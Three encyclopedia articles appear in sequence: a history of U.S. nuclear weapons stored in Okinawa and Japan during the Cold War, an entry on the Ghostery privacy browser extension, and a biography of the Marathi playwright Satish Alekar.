By the 1960s Okinawa was known as "The Keystone of the Pacific" to U.S. strategists and as "The Rock" to U.S. servicemen. Okinawa was critical to America's Vietnam war effort where commanders reasoned that, "without Okinawa, we cannot carry on the Vietnam war."
During U.S. involvement in the Vietnam War the use of nuclear weapons was suggested in order to "defoliate forests, destroy bridges, roads, and railroad lines." In addition, the use of nuclear weapons was suggested during the planning for the bombing of Vietnam's dikes in order to flood rice paddies, disrupt the North Vietnamese food supply, and leverage Hanoi during negotiations. Each of the Cold War plans employing a U.S.-launched nuclear first strike was ultimately rejected.
Strategic Air Command had designated Kadena (as well as Yokota Air Base on the mainland), as a dispersal location for new airborne command post aircraft, codenamed "Blue Eagle", in 1965. The 9th Airborne Command and Control Squadron of the 15th Air Base Wing provided this airborne command and control to Commander in Chief Pacific Command from Hickam Air Force Base, Hawaii, after 1969.
Specially-equipped United States Navy C-130s, operating from Japanese bases, enabled the National Command Authority to control Single Integrated Operational Plan (SIOP) processes for theater or general nuclear war. These exercises continued at least into the 1990s.
Nuclear weapons deployment, storage and transit
Okinawa hosted 'hundreds of nuclear warheads and a large arsenal of chemical munitions' for many years.
Article 9 of the Japanese Constitution, written by MacArthur immediately after the war, contains a total rejection of nuclear weapons. But when the U.S. military occupation of Japan ended in 1951, a new security treaty was signed that granted the United States rights to base its "land, sea, and air forces in and about Japan."
In 1959, Prime Minister Nobusuke Kishi stated that Japan would neither develop nuclear weapons nor permit them on its territory. He instituted the Three Non-Nuclear Principles: "no production, no possession, and no introduction."
A 1960 accord with Japan permits the United States to move weapons of mass destruction through Japanese territory and allows American warships and submarines to carry nuclear weapons into Japan's ports and American aircraft to bring them in during landings. The agreement allows the United States to deploy or store nuclear arms in Japan without requiring the express permission of the Japanese Government. The discussion took place during negotiations in 1959, and the agreement was made in 1960 by Aiichiro Fujiyama, then Japan's Foreign Minister.
There were many things left unsaid; it was a very sophisticated negotiation. The Japanese are masters at understood and unspoken communication in which one is asked to draw inferences from what may not be articulated.
The secret agreement was concluded without any Japanese text so that it could be plausibly denied in Japan. Since only the American officials recorded the oral agreement, not having the agreement recorded in Japanese allowed Japan's leaders to deny its existence without fear that someone would leak a document to prove them wrong. The arrangement also made it appear that the United States alone was responsible for the transit of nuclear munitions through Japan. However, the original agreement document turned up in 1969 during preparation for an updated agreement, when a memorandum was written by a group of U.S. officials from the National Security Council Staff; the Departments of State, Defense, Army, Commerce and Treasury; the Joint Chiefs of Staff; the Central Intelligence Agency; and the United States Information Agency.
A 1963 national intelligence estimate authored by the Central Intelligence Agency, Japan's Problems and Prospects, stated that:
Post-war governance of Southern Japanese Island chains
After the Battle of Okinawa the island was first placed under the control of the United States Navy. Following the surrender of Japan, the U.S. military occupied Japan; Okinawa was put under the control of the United States Military Government of the Ryukyu Islands on September 21, 1945, and an Okinawa Advisory Council was created.
Following the war, the Bonin Islands including Chichi Jima, the Ryukyu Islands including Okinawa, and the Volcano Islands including Iwo Jima were retained under American control.
In 1952 Japan signed the Treaty of San Francisco that allowed the future control of Okinawa and Japan's southern islands by the United States Military Government (USMG) in post-occupation Japan. The United States Civil Administration of the Ryukyu Islands (USCAR), as part of the Department of Defense, maintained overriding authority over the Japanese Government of the Ryukyu Islands.
Return
The Johnson administration gradually realized that it would be forced to return Chichi Jima and Iwo Jima "to delay reversion of the more important Okinawa bases"; however, President Johnson also wanted Japan's support for U.S. military operations in Southeast Asia.
Prime Minister Eisaku Satō and Foreign Minister Takeo Miki had explained to the Japanese parliament that the return of the Bonins had nothing to do with nuclear weapons, yet the final agreement included a secret annex, and its exact wording remained classified. A December 30, 1968, cable from the U.S. embassy in Tokyo is titled "Bonin Agreement Nuclear Storage," but within the same file the National Archives contains a "withdrawal sheet" for an attached Tokyo cable dated April 10, 1968, titled "Bonins Agreement--Secret Annex". The Bonin and Volcano islands were eventually returned to Japan in June 1968.
On the one-year anniversary of a B-52 explosion and near-miss at Kadena, Prime Minister Sato and President Nixon met in Washington, DC, where several agreements were reached, including a revised Status of Forces Agreement (SOFA) and a formal policy related to the future deployment of nuclear weapons on Okinawa.
A draft of the November 21, 1969, Agreed Minute to Joint Communique of United States President Nixon and Japanese Prime Minister Sato was found in 1994. The English text of the draft agreement reads:
United States President:
Japanese Prime Minister:
This situation persisted until the 1971 Okinawa Reversion Agreement took effect on May 15, 1972, when the Ryukyu Islands were returned to Japan.
Nuclear weapons bases in Japan
A declassified 1956–57 Far East Command manual, Standing Operating Procedures for Atomic Operations, revealed that there were thirteen locations in Japan that "had nuclear weapons or their components, or were earmarked to receive them in times of crisis or war." Among the nuclear-capable base locations were Misawa and Itazuke Air Bases, and Yokosuka and Sasebo, where U.S. Navy warships held nuclear weapons. The Bulletin of the Atomic Scientists reveals that the other locations that held nuclear weapons in Japan were Johnson Air Base, Atsugi Air Base, Komaki Air Base, and Iwakuni Air Base.
Southern Japanese Island chains
The island chains were among the thirteen separate locations in Japan that had nuclear weapons. According to a former U.S. Air Force officer stationed on Iwo Jima, the island would have served as a recovery facility for bombers after they had dropped their bombs on the Soviet Union or China. War planners reasoned that bombers could return to Iwo Jima, "where they would be refueled, reloaded, and readied to deliver a second salvo," as the assumption was that the major U.S. bases in Japan and the Pacific theater would be destroyed in a nuclear war. War planners believed that a small base might evade destruction and be a safe harbor for surviving submarines to reload. Supplies to re-equip submarines, as well as anti-submarine weapons, were stored within caves on Chichi Jima.
Okinawa
At one point Okinawa hosted approximately 1,200 nuclear warheads. The Okinawa-based nuclear weapons included 19 different weapons systems.
From 1955–56 to 1960, the 663rd Field Artillery Battalion operated the Army's 280mm M65 Atomic Cannon ("Atomic Annie") from Okinawa. In the 1960s, nuclear storage locations included four MGM-13 Mace missile sites, Chibana at Kadena Air Base, Naha Air Base, Henoko [Camp Henoko (Ordnance Ammunition Depot) at Camp Schwab], and the Army MIM-14 Nike-Hercules air defense launch locations.
Nuclear Weapons in Okinawa
From 1961 to 1969, the 498th Tactical Missile Group operated the MGM-13 Mace nuclear-armed cruise missile on Okinawa. Thirty-two Mace missiles were kept on constant alert in hardened hangars at four Okinawa launch sites by the 873d Tactical Missile Squadron. The four Mace sites were assigned to Kadena Air Base and located at Bolo Point in Yomitan, Onna Point, White Beach, and in Kin just north of Camp Hansen.
There were eight Nike-Hercules launch sites dispersed throughout the Ryukyu Islands. The Integrated Fire Control (IFC) area for the islands' anti-air missile systems was located at Naha AFB. The Army's 97th Anti-Aircraft Artillery Group received Nike-Hercules SAMs in 1959, and with two name changes (the formation became the 30th Artillery Brigade (Air Defense) and then the 30th Air Defense Artillery Brigade), the U.S. Army continued to operate the Nike missiles there until June 1973, when all the Nike sites were turned over to the Japan Air Self-Defense Force.
North American F-100 Super Sabre fighter-bombers capable of carrying hydrogen bombs were also present at Kadena Air Base.
The Chibana depot held warheads for atomic and thermonuclear weapons systems in the hardened weapon storage area. The depot held the Mark 28 nuclear bomb warheads used in the MGM-13 Mace cruise missile as well as warheads for nuclear armed MGR-1 Honest John and MIM-14 Nike-Hercules (Nike-H) missiles.
Nuclear weapons were stored in Henoko at an ammunition depot adjacent to Camp Schwab. The depot was constructed in 1959 for the U.S. Army 137th Ordnance Company (Special Weapons).
In July 1967, a proposal to greatly expand the base at Henoko was made by the United States Department of Defense. The plan included construction of an expanded special weapon storage area to house nuclear weapons, a port, and runways adjacent to Camp Schwab. The plan was approved in 1968 by JCS Chairman Earle Wheeler and U.S. Secretary of Defense Robert S. McNamara, a fact that only came to light in 2016. The plan was not implemented because of fears that the required seizure of civilian-owned land would cause protests to erupt, a decreased need as the Vietnam War drew down, and budgetary restrictions.
After reversion in 1972, Camp Henoko was created when the Army's Henoko Ammunition Storage Depot was turned over to the U.S. Marine Corps's Henoko Navy Ammunition Storage Facilities. The facility is now known as Henoko Ordnance Ammunition Depot.
Nuclear weapons accidents
Nuclear weapons incidents on the island that were publicized garnered international opposition to chemical and nuclear weapons and set the stage for the 1971 Okinawa Reversion Agreement, which officially ended the U.S. military occupation of Okinawa.
In June or July 1959, a MIM-14 Nike-Hercules anti-aircraft missile was accidentally fired from the Nike site 8 battery at Naha Air Base on Okinawa; according to some witnesses, it was complete with a nuclear warhead. While the missile was undergoing continuity testing of the firing circuit, known as a squib test, stray voltage caused a short circuit in a faulty cable that was lying in a puddle and allowed the missile's rocket engines to ignite with the launcher still in a horizontal position. The Nike missile left the launcher, smashed through a fence and went down into a beach area, skipping the warhead out across the water "like a stone." The rocket's exhaust blast killed two Army technicians and injured one. Similar accidental launches of the Nike-Hercules missile had occurred at Fort George G. Meade and in South Korea. Newsweek magazine reported that, following a highly publicized U.S. nuclear weapons accident in 1961, Kennedy was informed that there had been "two cases in which nuclear armed anti-aircraft missiles were actually launched by inadvertence."
On October 28, 1962, during the peak of the Cuban Missile Crisis, U.S. strategic forces were at Defense Condition Two (DEFCON 2). According to missile technicians who witnessed events, the four MACE B missile sites on Okinawa erroneously received coded launch orders to fire all of their 32 nuclear cruise missiles at the Soviets and their allies. Quick thinking by Capt. William Bassett, who questioned whether the order was "the real thing, or the biggest screw up we will ever experience in our lifetime", delayed the launch until the error was realized by the missile operations center. According to witness John Bordne, Capt. Bassett was the senior field officer commanding the missiles and was nearly forced to have armed guards shoot a subordinate lieutenant who was intent on following the orders to launch his missiles. No U.S. Government record of this incident has ever been officially released. Former missileers have refuted Bordne's account.
Next, on December 5, 1965, in an incident at sea near Okinawa, an A-4 Skyhawk attack aircraft rolled off an elevator of the aircraft carrier USS Ticonderoga (CV-14) into 16,000 feet of water, resulting in the loss of the pilot, the aircraft, and the B43 nuclear bomb it was carrying, all of which were too deep for recovery. Since the ship was traveling to Japan from duty in the Vietnam war zone, no public mention was made of the incident at the time, and it would not come to light until 1981, when a Pentagon report revealed that a one-megaton bomb had been lost. Japan then formally asked for details of the incident.
In September 1968, Japanese newspapers reported that radioactive Cobalt-60 had been detected contaminating portions of the Naha Port Facility, sickening three. The radioactive contamination was believed by scientists to have emanated from visiting U.S. nuclear submarines.
At former nuclear storage areas in Okinawa, including Henoko, where construction of a proposed air base for the relocation of MCAS Futenma has been planned adjacent to the weapon storage facility, environmental concerns have been raised by the Environmental Protection Agency's findings of nuclear contamination at other U.S. nuclear weapons sites. The Status of Forces Agreement allows the U.S. military exemptions for environmental protection and remediation. In 1996, unused land inside the former Chibana, now Kadena, Ammunition Storage Area was offered as a location to which the Futenma facility could be moved. Okinawans residing near the base munitions area protested those plans and the idea went unrealized. Later that year a location adjacent to the Henoko Ordnance Ammunition Depot at Camp Schwab was selected for the replacement facility.
1968 B-52 Crash at Kadena Air Base
On November 19, 1968, a U.S. Air Force Strategic Air Command B-52D Stratofortress with a full bomb load broke up and caught fire after the plane aborted takeoff at Kadena Air Base, Okinawa, before an Operation Arc Light bombing mission to Vietnam during the Vietnam War. The pilot was able to keep the plane on the ground and bring the aircraft to a stop, preventing a much larger catastrophe. The aircraft came to rest near the edge of Kadena's perimeter, some 250 meters from the Chibana Ammunition Depot.
The crash led to demands to remove the B-52s from Okinawa and strengthened the push for reversion from U.S. rule in Okinawa. Okinawans had correctly suspected that the Chibana depot held nuclear weapons. The crash, together with a nerve gas leak from the Chibana depot the following year, sparked fears that another potential disaster on the island could put the chemical and nuclear stockpile and the surrounding population in jeopardy, and increased the urgency of moving them to a less populated and less active storage location.
Weapon withdrawal
A U.S. policy to neither confirm nor deny the presence of nuclear weapons was created during the late 1950s when Japan's government asked for a guarantee that U.S. nuclear weapons would not be based "in Japan."
The U.S. eventually revealed the presence of nuclear weapons during negotiations over the 1971 Okinawa Reversion Agreement, which later returned sovereignty to Japan. In 1971, "the U.S. government demanded and received payment from the Japanese government to help defray the expenses of removing nuclear weapons from Okinawa".
During Okinawa's reversion to Japan in 1972, CINCPAC and the U.S. National Security Council (NSC) concluded that Japan's government "tacitly" allowed nuclear weapons to enter Japanese harbors on warships as had been outlined in earlier secret agreements with Japan.
The effect of the 1971 agreements was that the U.S. would remove nuclear weapons from sites in Japan in exchange for ships with nuclear weapons being permitted to visit ports. Nuclear weapons based on Okinawa were reportedly removed prior to 1972. However, though a diplomatic notification was suggested, permission from Japan was not a requirement for the return of U.S. nuclear weapons. In a 1981 interview, Edwin O. Reischauer, the former U.S. ambassador to Japan, confirmed that "U.S. naval vessels carrying nuclear weapons routinely visited ports in Japan with the tacit approval of the Japanese government, violating the LDP's oft-stated 'three non-nuclear principles' prohibiting their manufacture, possession, or introduction."
When Japan asserted that nuclear weapons must be removed after reversion, they were withdrawn from sites in Okinawa during the early 1970s. Kristensen writes that criticisms following a 1969 Far East visit by a U.S. Senate Foreign Relations Committee prompted the JCS in 1974 to order a study of the forward-deployed tactical nuclear weapons at East Asian bases. The study found the number of sites could be reduced because they had had more weapons than required, as well as that response teams at sites with nuclear weapons were unprepared for a coordinated attack and might be vulnerable to terrorists. Following the JCS order, the Department of Defense began withdrawing U.S. tactical nuclear weapons from Taiwan in 1974, and from the Philippines in 1976. Kristensen writes that the DOD withdrawal of forward-deployed weapons was 'not simply' due to the sovereignty-return negotiations.
After reversion, the nuclear alert role on Okinawa increased and command and control aircraft continued to operate from the island. The U.S. continues to follow the policy of "neither confirm nor deny" regarding the present location of U.S. nuclear weapons and in many cases, of past locations.
Subsequent developments
Early in March 2010, a Government of Japan inquiry revealed the existence of secret agreements for nuclear weapons brought into Japan. The panel findings ended decades of official denial about the secret nuclear agreements in Japan.
The Liberal Democratic Party had been in power for the previous 50 years, and the long-ruling conservatives repeatedly denied the existence of the pacts. The panel was set up by Japan's newly elected Democratic Party government in an effort by Prime Minister Yukio Hatoyama to restore public trust and to increase transparency about the secret nuclear agreements with the U.S.
Japan's Foreign Minister Katsuya Okada revealed the findings of the panel and admitted that previous governments had lied to the Japanese public, over decades, about nuclear weapons agreements with the U.S. in violation of the country's non-nuclear principles. The pacts had been kept secret for over five decades over fears of public anger.
The existence of the secret pacts was already an open secret, as the deals had been revealed in declassified U.S. files.
One of the secret pacts had come to light in 1972, when Takichi Nishiyama, a reporter for the Mainichi Daily, uncovered it. He was convicted and jailed for obtaining it.
Four previously secret pacts were released in Japan as part of the announcement. The pacts showed different interpretations between the countries of restrictions and an "unspoken understanding" permitting port calls for warships without prior consent.
The announcement revealed an April 1963 meeting between Reischauer and Foreign Minister Masayoshi Ohira at which a "full mutual understanding" on the "transit issue" was reached.
The release also revealed a "vague" secret agreement over Japan's cost burdens for Okinawa's 1972 reversion to Japan.
Hans Kristensen of the Federation of American Scientists said that at the time the country was facing a difficult decision between national security for Japan under a U.S. nuclear umbrella and telling the public the truth; the decision makers chose to be "economical with the truth." The pacts revealed that nuclear weapons could be returned to Japan during a military crisis in Korea.
In December 2015, the United States Government acknowledged officially for the first time that it had stored nuclear weapons in Okinawa prior to 1972. That U.S. nuclear weapons had been located in Okinawa had long been an open secret. The fact had been widely understood or strongly speculated since the 1960s and was subsequently revealed by the U.S. military in apparently unnoticed photographs of nuclear weapons and delivery systems on Okinawa that were declassified and released to the U.S. National Archives in 1990.
In March 2017, Japan joined the United States and the established nuclear powers under the Treaty on the Non-Proliferation of Nuclear Weapons in abstaining from United Nations negotiations on a total ban of nuclear weapons, in opposition to the 113 other signatory countries involved in the discussion.
Submarines with cruise missiles from the United States visit the Yokosuka and Sasebo ports as part of the nuclear deterrence and planning arrangement with Japan.
References
Nuclear weapons of the United States
Nuclear weapons program of the United States
United States Atomic Energy Commission
United States Department of Energy
Cold War history of the United States
Nuclear weapons policy
Government of Japan
Environment of Japan
Politics of Japan
Nuclear technology in Japan
History of the foreign relations of Japan
United States military in Japan
History of Okinawa Prefecture
Ryukyu Islands
|
32021735
|
https://en.wikipedia.org/wiki/Ghostery
|
Ghostery
|
Ghostery is a free and open-source privacy and security-related browser extension and mobile browser application. Since February 2017, it has been owned by the German company Cliqz International GmbH (formerly owned by Evidon, Inc., which was previously called Ghostery, Inc. and the Better Advertising Project). The code was originally developed by David Cancel and associates.
Ghostery enables its users to detect and control JavaScript "tags" and "trackers" in order to remove JavaScript bugs and beacons that are embedded in many web pages which allow for the collection of a user's browsing habits via HTTP cookies, as well as participating in more sophisticated forms of tracking such as canvas fingerprinting.
As of 2017, Ghostery is available for Mozilla Firefox, Google Chrome, Internet Explorer, Microsoft Edge, Opera, Safari, iOS, Android, and Firefox for Android.
Additionally, Ghostery's privacy team creates profiles of page elements and companies for educational purposes.
Functionality
Blocking
Ghostery blocks HTTP requests and redirects according to their source address in several ways:
Blocking third-party tracking scripts that are used by websites to collect data on user behavior for advertising, marketing, site optimization, and security purposes. These scripts, also known as "tags" or "trackers", are the underlying technology that places tracking cookies on consumers' browsers.
Continuously curating a "script library" that identifies when new tracking scripts are encountered on the Internet and automatically blocking them.
Creating "Whitelists" of websites where third-party script blocking is disabled and other advanced functionality for users to configure and personalize their experience.
When a tracker is blocked, any cookie that the tracker has placed is not accessible to anyone but the user and thus cannot be read when called upon.
Reporting
Ghostery reports all tracking packages detected, and whether Ghostery has blocked them or not, in a "findings window" accessible from clicking on the Ghostery Icon in the browser. When configured, Ghostery also displays the list of trackers present on the page in a temporary purple overlay box.
History and use
Originally developed by David Cancel, Ghostery was acquired by Evidon (renamed Ghostery, Inc.) in January 2010. Ghostery is among the most popular browser extensions for privacy protection. In 2014, Edward Snowden suggested consumers use Ghostery along with other tools to protect their online privacy.
Ghostery, Inc. made their software source code open for review in 2010, but did not release further versions of the source code after that. On February 22, 2016, the company released a new EULA for the Ghostery browser extension, making it a proprietary closed-source product.
Cliqz GmbH acquired Ghostery from Evidon Inc. in February 2017. Cliqz is a German company majority-owned by Hubert Burda Media. Ghostery no longer shares data of any kind with Evidon.
On March 8, 2018, Ghostery shifted back to an open source development model and published their source code on GitHub, saying that this would allow third-party contributions as well as make the software more transparent in its operations. The company said that Evidon's business model "was hard to understand and lent itself to conspiracy theories", and that its new monetization strategy would involve affiliate marketing and the sale of ad analytics data.
In May 2018, in the distribution of an email promoting changes to Ghostery's practices to comply with General Data Protection Regulation (GDPR), hundreds of user email addresses were accidentally leaked by listing them as recipients. Ghostery apologized for the incident, stating that they stopped the distribution of the email when they noticed the error, and reported that this was caused by a new in-house email system that accidentally sent the message as a single email to many recipients, rather than sending it individually to each user.
Criticism
Under its former owner Evidon, Ghostery had an opt-in feature called GhostRank. GhostRank could be enabled to "support" its privacy function. GhostRank took note of ads encountered and blocked, then sent that information back to advertisers so they could better formulate their ads to avoid being blocked. Though Ghostery claims that the data is anonymized, patterns of web page visits cannot truly be anonymized. Not everyone sees Evidon's business model as conflict-free. Jonathan Mayer, a Stanford graduate student and privacy advocate, has said: "Evidon has a financial incentive to encourage the program's adoption and discourage alternatives like Do Not Track and cookie blocking as well as to maintain positive relationships with intrusive advertising companies".
Since July 2018, with version 8.2, Ghostery shows advertisements of its own to users. Burda claims that the advertisements do not send personal data back to their servers and that they do not create a personal profile.
See also
Ad blocking
Disconnect Mobile
DoNotTrackMe
List of formerly proprietary software
NoScript
Online advertising
Privacy Badger
uBlock Origin
References
External links
Online advertising
Free Firefox WebExtensions
Google Chrome extensions
Internet privacy software
Opera Software
Internet Explorer add-ons
IOS software
Formerly proprietary software
Free and open-source Android software
Adware
|
23040565
|
https://en.wikipedia.org/wiki/Satish%20Alekar
|
Satish Alekar
|
Satish Vasant Alekar (born 30 January 1949) is a Marathi playwright, actor, and theatre director. A founder member of the Theatre Academy of Pune, he is best known for his plays Mahanirvan (1974), Mahapoor (1975), Atirekee (1990), Pidhijat (2003), Mickey ani Memsahib (1973), and Begum Barve (1979), all of which he also directed for the Academy. Today, along with Mahesh Elkunchwar and Vijay Tendulkar, he is one of the most influential and progressive playwrights not just in modern Marathi theatre but also in the larger modern Indian theatre.
He also headed the Centre for Performing Arts, University of Pune (1996–2009), which he founded after forgoing the directorship of the NSD, and has previously been an adjunct professor at various universities in the US: Duke University, Durham, NC (1994); Performance Studies, Tisch School of the Arts, New York University, as a Fulbright Scholar (2003); and the Dept. of Theatre and Film Studies, University of Georgia, Athens, GA (2005).
He was awarded the Sangeet Natak Akademi Award in Playwriting (Marathi) in 1994 by the Sangeet Natak Akademi, India's National Academy of Music, Dance and Drama. He received the Padma Shri (पद्मश्री), conferred by the President of India, in January 2012.
Since 2013, Alekar has been nominated by Savitribai Phule Pune University as a Distinguished Professor on the campus.
More recently, he has also become known for his screen acting in both Marathi and Hindi feature films, appearing in character roles in award-winning films such as Ventilator (2016).
Early life and education
Alekar was born in Delhi, India, but grew up in Pune, a center of Marathi culture in Maharashtra. He studied at the Marathi-medium New English School, Ramanbag, which was established in 1880 by Lokmanya Bal Gangadhar Tilak. He then went to Fergusson College and completed his BSc, and he received his master's degree in biochemistry from the University of Pune in 1972.
Career
Alekar gained his first stage experience as an actor in a college play. Impressed by his performance, director Bhalba Kelkar, who had set up the Progressive Dramatic Association, invited him to join it. Alekar wrote and directed his first one-act play Jhulta Pool in 1969. He became a part of a young circle that Jabbar Patel had started within the Progressive Dramatic Association.
This group split from the parent body in 1973 and set up the Theatre Academy in Pune. The split was over Vijay Tendulkar's play Ghashiram Kotwal: the senior members decided against its premiere in 1972, and Patel's group decided to produce it under the auspices of its own Theatre Academy. Alekar assisted Patel in the direction of Ghashiram Kotwal, and the group has since mounted over 35 plays by him and managed to establish its foothold in experimental Marathi theatre.
Alekar conceived of and implemented the Playwrights Development Scheme and the Regional Theatre Group Development programme. The Ford Foundation supported these programs for the Theatre Academy, Pune, during 1985–1994.
Alekar has collaborated in several international play translation projects. The Tisch School of Arts at New York University invited him in 2003 to teach a course on Indian Theatre. The Department of Theater and Films Studies, University of Georgia invited him in 2005 to direct an English production of his play Begum Barve.
The Holy Cow Performing Arts Group in Edinburgh, Scotland performed an English version of Alekar's Micky And Memsahib on 27 and 28 August 2009 at Riddle's Court in Edinburgh Fringe Festival '09.
During July 1996 – January 2009, Alekar worked as a professor and the head of the Centre for Performing Arts (Lalit Kala Kendra) at the University of Pune. Previously he was a research officer in biochemistry at the government-run B. J. Medical College, Pune. He worked as the Honorary Director for a program supported by the Ratan Tata Trust at the University of Pune during 2009–2011. In September 2013 the University of Pune honoured Alekar by nominating him as a Distinguished Professor on the campus. The University of Pune is the first state university in India to nominate Distinguished Professors on the campus.
Plays
List of original Marathi मराठी plays written since 1973
Micki Aani Memsaheb मिकी आणि मेमसाहेब (1973)*
Mahanirvan महानिर्वाण (1974)*
Mahapoor महापूर (1975)
Begum Barve बेगम बर्वे (1979)*
Shanwar Raviwar शनवार रविवार (1982)*
Dusra Samana दुसरा सामना (1987)
Atireki अतिरेकी (1990)*
Pidhijat पिढीजात (2003)*
Ek Divas Mathakade एक दिवस मठाकडे (2012)
Thakishi Sanvad' ठकीशी संवाद (2020) New Play written during COVID-19 lockdown (March–July 2020) to be produced in 2021–22
* Plays directed by Satish Alekar for Theatre Academy, Pune.
Mahapoor (1975) Directed by Mohan Gokhale for Theatre Academy, Pune
Dusra Samna (1987) Directed by Waman Kendre for Kala Vaibhav, Mumbai
Ek Divas Mathakade (2012) Directed by Nipun Dharmadhikari for Natak Company, Pune
List of original Marathi मराठी one-act plays
Memory मेमरी (1969)
Bhajan भजन (1969)
Ek Zulta Pool एक झुलता पूल (1971)*
Dar Koni Ughadat Naahi दर कोणी उघडत नाही (1979)
Bus Stop बस स्टॅाप (1980)
List of adapted/translated one-act plays
Judge जज्ज (1968)
Yamuche Rahasya यमुचे रहस्य (1976)
Bhint भिंत (1980)*
Valan वळण(1980)*
Alshi Uttarvalyachi Gosht आळशी अत्तरवाल्याची गोष्ट (1999)**
Nashibvan Baiche Don नशीबवान बाईचे दोन (1999)**
Supari सुपारी (2002)
Karmaachari कर्मचारी (2009)
** Directed by Satish Alekar for Lalit Kala Kendra ललित कला केंद्र (Centre For Performing Arts, University of Pune)
* Directed for Theatre Academy, Pune
Alekar started writing at the age of 19, while studying chemistry, though most of his early works were short plays. Many of his plays are set in Pune's Brahmin society, highlighting its narrow-mindedness; he subsequently ventured into small-town politics with Doosra Samna (1989). Mahanirvan (1973) (The Dread Departure), which finds black humour in the Hindu death rites of Brahmins and their overt seriousness, is today Alekar's best-known early work and has since been performed in Bengali, Hindi, Dogri, Konkani and Gujarati. It was originally a one-act play that he later expanded at Patel's insistence. It was first staged on 22 November 1974 at the Bharat Natya Mandir by the Theatre Academy, Pune, and was revived in 1999 for its 25th anniversary at the same venue, with most of the original cast intact.
Mickey Ani Memsaheb (1974) was his first full-length script. With the exception of Mahapoor (1975), he directed all of his own plays. Alekar's Begum Barve (1979) is regarded as a classic of contemporary Marathi theatre. It deals with the eponymous female impersonator's memories and fantasies: after his musical company closes down, a minor singer-actor starts selling incense sticks on the street and is exploited by his employer. One day his fantasies become enmeshed with those of a pair of clerks who are his regular customers, and those fantasies are almost fulfilled. The play has been staged in Rajasthani, Punjabi, Gujarati, Bengali, Konkani, Tamil and Kannada. In 2009, 30 years after its first production, the play returned to Mumbai with original cast members Chandrakant Kale and Mohan Aghashe.
Alekar's other plays are Bhajan, Bhinta, Walan, Shanivar-Ravivar (1982), Dusra Samna (1987), and Atireki (1990); the first three are one-act plays. Atireki is marked by irony, wit, and tangential take-offs from absurd premises. In January 2011 a book of short plays translated or adapted into Marathi by Satish Alekar was published by Neelkanth Prakashan, Pune under the title "Adharit Ekankika".
Two volumes of criticism have been published in Marathi on the plays Mahanirvan (Dread Departure) and Begum Barve:
1) "Mahanirvan: Sameeksha aani Sansmarne" (महानिर्वाण समिक्षा आणि संस्मरणे) (A volume of critique in Marathi on the play ' Mahanirvan'-Dread Departure Edited by Dr. Rekha Inmadar-Sane published by M/s Rajhans Prakashan, Pune, I Edition Dec 1999, II Edition March 2008, , Pages: 254, Price Rs.250/-) The volume first published in 1999 to mark the 25th year run of the production of the play produced by Theatre Academy, Pune directed by Satish Alekar. Volume included 90 pages of the extensive interview of the playwright Satish Alekar.
2) "Begum Barve Vishayee" (बेगम बर्वे विषयी) (About the play Begum Barve) Edited by Dr. Rekha Inamdar-Sane published in June 2010 by M/s Rajhans Prakashan, Pune,
Pages 169, Price: Rs. 200/- The books has nine articles analysing the text and the performance written by well-known theatre scholars.
Acting reading performance
Aparichit Pu La (अपरिचित पु.लं.) (2018) is a 90-minute acted reading programme on the lesser-known writings of the legendary writer and performer P. L. Deshpande पु.ल.देशपांडे (1919–2000), produced by Shabda Vedh, Pune (शब्द वेध, पुणे) to mark the writer's birth centenary. Conceived by Chandrakant Kale, its cast comprises Satish Alekar, Chandrakant Kale and Girish Kulkarni. The first show was performed during Pulotsav on 22 November 2018 at the Balgandharva Rang Mandir, Pune; since then performances have been staged in Pune, Solapur, Ratnagiri and Mumbai.
Film scripts
Alekar scripted the National Film Award-winning Marathi feature film Jait Re Jait (1977), directed by Jabbar Patel, and later directed a 13-part Hindi TV serial, Dekho Magar Pyarse, for Doordarshan in 1985. He scripted the dialogues for the Marathi feature film Katha Don Ganpatravanchi in 1995–96.
Writing for Marathi newspaper
Alekar wrote 'Gaganika', a fortnightly column in Marathi for the Sunday edition of Loksatta from January to December 2015, based on his journey in the performing arts since 1965. The column became popular, and a book based on it, Gaganika (260+12 pages plus 8 pages of photographs, hardback Rs. 375, paperback Rs. 300), was published on 30 April 2017 by Rajhans Prakashan, Pune.
Awards and recognition
Some of Alekar's plays have been translated and produced in Hindi, Bengali, Tamil, Dogri, Kannada, Gujarati, Rajasthani, Punjabi, and Konkani. His plays have been included in the National Anthologies published in 2000–01 by the National School of Drama and Sahitya Akademi, Delhi.
Alekar is the recipient of several national and state awards for his contribution to the field of Theater and Literature.
In 1974 his collection of short plays Zulta Pool (झुलता पूल) received the award for best collection of short plays from the Ministry of Culture, Government of Maharashtra.
In 1975 he received the Ram Ganesh Gadkari award from the State of Maharashtra for his play Mahanirvan (महानिर्वाण).
He received the Nandikar Sanman in Calcutta in 1992.
He received fellowships from the Asian Cultural Council, New York in 1983 to study theatre in the US, and from the Ford Foundation to study Theatre of South Asia in 1988.
In 1994 he received the Sangeet Natak Akademi Award for playwriting from the Sangeet Natak Akademi, Delhi (संगीत नाटक अकादमी, दिल्ली).
He received the State Award for Best Actor in a Comedy Role for the Marathi film Katha Don Ganpatravanchi (कथा दोन गणपतरावांची), directed by Arun Khopkar (1997).
He received the Vi. Va. Shirwadkar (poet Kusumagraj) award for playwriting from the Natya Parishad, Nasik, in 2007.
He received a Lifetime Achievement felicitation (जीवन गौरव) from the Akhil Bharatiya Marathi Natya Parishad, Mumbai, in February 2012.
He received the Padma Shri (पद्मश्री), conferred by the President of India, in January 2012.
In December 2013 Satish Alekar received the Balraj Sahni Memorial Award (बलराज सहानी स्मृती पुरस्कार) in Pune for his contribution over the last 40 years as a playwright, director and actor.
In 2014 he was awarded the poet and playwright "Aarati Prabhu" Award (कवि आरती प्रभू) by Baba Vardam Theatres, Kudal, Sindhudurg district.
In 2017 he received the Tanveer Sanman (तन्वीर सन्मान), a prestigious national award for lifetime contribution to theatre constituted by veteran actor Dr. Shriram Lagoo through Rupavedh Pratisthan, Pune. The award function was held in Pune on 9 December 2017.
In 2018 his book Gaganika (गगनिका) received the Adv. Tryambakrao Shirole award for best non-fiction (उत्कृष्ट ललित गद्य) from the Maharashtra Sahitya Parishad, Pune.
Natakkar Satish Alekar (Playwright Satish Alekar), a 90-minute film by Atul Pethe about Alekar's life and work, was released in 2008.
Works
The Dread Departure (Mahanirvan), tr. by Gauri Deshpande. Seagull Books, 1989.
"Collected Plays of Satish Alekar. OUP, Delhi 2009, "
"Collected Plays of Satish Alekar"
Academic Honour
The following scholars have completed Ph.D. research on the creative contribution of Satish Alekar as a playwright.
Sarjerao Rankhamb, Deglur, was awarded a Ph.D. by SPPU in July 2019 for the research “नाटककार सतीश आळेकर: एक आकलन”, under the guidance of Dr. Manohar Jadhav, Marathi Department, SPPU.
